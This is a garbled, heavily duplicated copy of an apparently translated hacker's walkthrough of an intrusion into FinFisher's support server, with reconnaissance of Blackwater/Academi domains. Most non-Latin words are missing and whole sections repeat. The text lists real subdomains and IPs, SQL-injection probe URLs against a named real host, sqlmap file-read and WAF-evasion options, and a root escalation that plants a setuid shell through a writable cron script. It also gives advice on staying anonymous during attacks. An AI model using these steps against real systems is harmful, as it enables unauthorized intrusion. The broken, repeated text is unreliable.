Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
